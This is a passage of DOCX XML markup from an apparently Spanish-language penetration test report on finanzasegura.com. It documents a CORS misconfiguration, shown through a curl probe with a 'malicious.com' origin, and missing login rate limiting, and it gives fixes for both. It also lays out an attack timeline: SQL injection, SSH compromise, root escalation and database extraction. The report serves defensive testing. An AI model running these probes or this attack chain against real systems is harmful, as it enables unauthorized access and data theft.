              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04FDC">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>🔸</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04FDC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #11:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A07C8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CORS mal configurado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEB0FEC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━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CED0DD" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A04FDC" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ubicación: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04FDC">
              <w:t>API en api.finanzasegura.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692F7923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CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04FDC">
              <w:t>4.8 (MEDIA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D471F29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C8353DF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25353BAC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A04FDC" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A04FDC">
              <w:t>La API permite solicitudes desde cualquier origen,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="063F0F07" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00A04FDC" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00A04FDC">
              <w:t>facilitando ataques CSRF y exfiltración de datos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C303558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207B347B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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31991F69" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009F6F28">
              <w:t>$ curl -H "Origin: http://malicious.com" \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A56D8FB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9F6F28">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="009F6F28">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-I https://api.finanzasegura.com/api/v1/accounts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50CF0D38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323AF6BC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6F28">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Access-Control-Allow-Origin: *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B185886" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6F28">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Access-Control-Allow-Credentials: true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1008D86F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3E63E64D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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1986F8DC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009F6F28">
              <w:t>- Robo de datos desde sitios maliciosos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A05BE13" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009F6F28">
              <w:t>- CSRF en operaciones sensibles</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7959DAE8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="009F6F28">
              <w:t>- Acceso no autorizado a API</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="072FE7BA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3D97E58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Recomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59D0E383" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6F28">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Access-Control-Allow-Origin: https://finanzasegura.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB507DC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6F28">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Access-Control-Allow-Credentials: true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FB52A5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="009F6F28" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F6F28">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Access-Control-Allow-Methods: GET, POST</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="189E67F9" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24036775" w14:textId="77777777" w:rsidR="005A07C8" w:rsidRDefault="005A07C8" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1977E561" w14:textId="77777777" w:rsidR="005A07C8" w:rsidRDefault="005A07C8" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C9BFD7D" w14:textId="77777777" w:rsidR="005A07C8" w:rsidRPr="007C4494" w:rsidRDefault="005A07C8" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B09180A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76EBEC14" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00C35C7D" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A07C8">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>🔸</w:t>
            </w:r>
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> VULNERABILIDAD #12:</w:t>
            </w:r>
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Falta de rate limiting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53CCC129" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00C35C7D" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="711B3282" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00C35C7D" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ubicación: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C35C7D">
              <w:t>/api/login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6DA5A7" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00C35C7D" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS: </w:t>
            </w:r>
            <w:r w:rsidRPr="00C35C7D">
              <w:t>4.5 (MEDIA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7878DE64" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00C35C7D" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FF8A3A7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Descripción:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10AB2B4B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>No existe limitación de intentos de login, permitiendo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11A885C2" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>ataques de fuerza bruta sostenidos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09202F1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2BAF6AC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Evidencia:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4995E73F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>Realizados 10,000 intentos de login en 5 minutos sin bloqueo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16D52FA9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B921CB9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Impacto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F648CC4" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>- Ataques de fuerza bruta ilimitados</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F7937CF" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>- Agotamiento de recursos del servidor</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="785EDCBC" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>- Denegación de servicio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A46FEA6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40A404F0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ecomendación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5E54D5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>1. Implementar rate limiting: 5 intentos por minuto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E973EE" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>2. Usar fail2ban o mod_evasive</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6711315F" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00CE2EBB">
              <w:t>3. Implementar CAPTCHA tras 3 intentos fallidos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A0076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2B48672A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  <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ejemplo Nginx:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AA75F3" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00CE2EBB" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE2EBB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>limit_req_zone $binary_remote_addr zone=login:10m rate=5r/m;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="440F066A" w14:textId="0F75F31E" w:rsidR="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE2EBB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>limit_req zone=login burst=5;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04BA732D" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="00A0CD8F" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E98E991" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68B82A54" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40C6B0E5" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="549D34F1" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F6C2E72" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E686D8D" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5ABE96E6" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="641AF4AA" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38BD000F" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40A994D5" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04DD258D" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DC2AB5B" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19D28052" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5928D83C" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="010C2BF1" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E618B1D" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F4F34D2" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53230443" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="767A99B0" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FB2108D" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="309A4DD3" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A5EC8BA" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63E7D615" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16B8D4A5" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DDC23A9" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BB770DA" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77A5D5A5" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C148965" w14:textId="77777777" w:rsidR="00EB646F" w:rsidRPr="00EB646F" w:rsidRDefault="00EB646F" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6AA73D52" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CE86654" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB646F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5. LÍNEA DE TIEMPO DEL ATAQUE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4274C8" w14:textId="25E949EF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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5286F84B" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[15/10/2025 22:00] - Inicio del test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF034B5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[15/10/2025 22:15] - Reconocimiento pasivo completado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0022C6F8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[15/10/2025 22:45] - Subdominio test.finanzasegura.com descubierto</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5137C8F2" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[15/10/2025 23:10] - SQL Injection exitoso - Acceso admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6424D63D" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[15/10/2025 23:30] - MySQL accedido desde Internet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743BC0B8" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[16/10/2025 00:15] - Compromiso de usuario jperez vía SSH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="335D3587" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[16/10/2025 00:30] - Escalada a root exitosa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19DB3810" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[16/10/2025 01:00] - Extracción de base de datos (modo controlado)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A028440" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00EB646F" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[16/10/2025 01:30] - Documentación de evidencias</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28453F48" w14:textId="03996B21" w:rsidR="00813C8C" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00EB646F">
              <w:t>[16/10/2025 02:00] - Limpieza de rastros de prueba</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A6B670E" w14:textId="77777777" w:rsidR="00813C8C" w:rsidRPr="00813C8C" w:rsidRDefault="00813C8C" w:rsidP="007C4494"/>
          <w:p w14:paraId="131C6A8C" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="007C4494" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>6. RESUMEN DE RIESGOS POR CATEGORÍA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44302DB6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━━</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07568972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1DE3843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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>📊</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Distribución de vulnerabilidades:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C54662F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CE0ECFF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Red/Infraestructura:        </w:t>
            </w:r>
            <w:r w:rsidRPr="00813C8C">
              <w:t>████████░░ 40% (5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BF0B6E6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Aplicación Web:            </w:t>
            </w:r>
            <w:r w:rsidRPr="00813C8C">
              <w:t>██████░░░░ 33% (4)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CA55B3D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 xml:space="preserve">Configuración/Hardening:   </w:t>
            </w:r>
            <w:r w:rsidRPr="00813C8C">
              <w:t>████░░░░░░ 25% (3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EAA0A26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C544F96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ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>🎯</w:t>
            </w:r>
            <w:r w:rsidRPr="007C4494">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Vectores de ataque identificados:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297E0A08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35394E5" w14:textId="77777777" w:rsidR="007C4494" w:rsidRPr="00857C78" w:rsidRDefault="007C4494" w:rsidP="007C4494">
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Acceso no autorizado </w:t>
            </w:r>
            <w:r w:rsidRPr="00857C78">
              <w:rPr>
